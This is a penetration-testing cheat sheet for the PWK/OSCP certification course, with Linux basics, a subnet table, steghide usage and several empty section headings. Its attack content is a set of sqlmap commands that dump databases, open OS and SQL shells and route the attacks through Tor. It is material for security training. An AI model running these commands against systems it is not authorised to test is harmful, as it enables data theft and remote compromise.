PWK-CheatSheet


Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet

Linux 101

Store the target IP address in the $ip environment variable

$ export ip=192.168.1.100

Find the location of a file

$ locate sbd.exe

Search through directories in the $PATH environment variable

$ which sbd

Find a file whose name contains a specific string

$ find / -name sbd\*

Show listening TCP ports and the processes that own them

$ netstat -lntp

Change Password

$ passwd

Verify a service is running and listening

$ netstat -antp |grep apache

Start a service

$ systemctl start ssh
$ systemctl start apache2

Unzip a gz file

$ gunzip access.log.gz

Unzip a tar.gz file

$ tar -xzvf file.tar.gz

Information Gathering & Vulnerability Scanning


Subnet Reference Table

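| CIDR | Addresses | Hosts | Netmask | Amount of a Class C |
|------|-----------|-------|---------|---------------------|
| /30 | 4 | 2 | 255.255.255.252 | 1/64 |
| /29 | 8 | 6 | 255.255.255.248 | 1/32 |
| /28 | 16 | 14 | 255.255.255.240 | 1/16 |
| /27 | 32 | 30 | 255.255.255.224 | 1/8 |
| /26 | 64 | 62 | 255.255.255.192 | 1/4 |
| /25 | 128 | 126 | 255.255.255.128 | 1/2 |
| /24 | 256 | 254 | 255.255.255.0 | 1 |
| /23 | 512 | 510 | 255.255.254.0 | 2 |
| /22 | 1024 | 1022 | 255.255.252.0 | 4 |
| /21 | 2048 | 2046 | 255.255.248.0 | 8 |
| /20 | 4096 | 4094 | 255.255.240.0 | 16 |
| /19 | 8192 | 8190 | 255.255.224.0 | 32 |
| /18 | 16384 | 16382 | 255.255.192.0 | 64 |
| /17 | 32768 | 32766 | 255.255.128.0 | 128 |
| /16 | 65536 | 65534 | 255.255.0.0 | 256 |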

apt-get install steghide

steghide extract -sf picture.jpg

steghide info picture.jpg

apt-get install stegosuite

Buffer Overflows and Exploits

Shells

File Transfers

Privilege Escalation

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)

Client, Web and Password Attacks

Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
Enumerate tables from a specific database
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
Dump table data from a specific database and table
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/?param1=value1&param2=value2" --dbs -p param2
Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1
Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell
Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs

Networking, Pivoting and Tunneling

The Metasploit Framework

Bypassing Antivirus Software